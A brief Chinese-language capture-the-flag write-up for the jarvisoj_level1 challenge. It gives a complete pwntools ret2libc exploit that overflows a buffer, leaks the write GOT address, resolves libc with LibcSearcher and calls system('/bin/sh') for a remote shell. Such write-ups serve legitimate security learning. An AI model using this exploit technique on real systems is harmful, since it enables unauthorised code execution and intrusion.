jarvisoj_level1

这道题本来以为是普通的shellcode,但是本地和远程竟然不一样，在第一次不会回显地址，而且好像在一次运行里地址也会不一样，那这样就不能用shellcode去打，还是要用ret2libc

点击查看代码

from pwn import *
from LibcSearcher import *

r = remote('node4.buuoj.cn',26405)
elf = ELF("./level1")
main_addr=0x80484b7
write_plt=elf.plt['write']
write_got=elf.got['write']

payload ='a' * (0x88 + 0x4 ) + p32(write_plt) + p32(main_addr) +p32(0x1)+p32(write_got)+p32(0x4) 

r.send(payload)
write_addr = u32(r.recv(4))

libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')

system_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload ='a' * (0x88 + 0x4) + p32(system_addr) + p32(main_addr)+ p32(bin_sh)

r.send(payload)
r.interactive()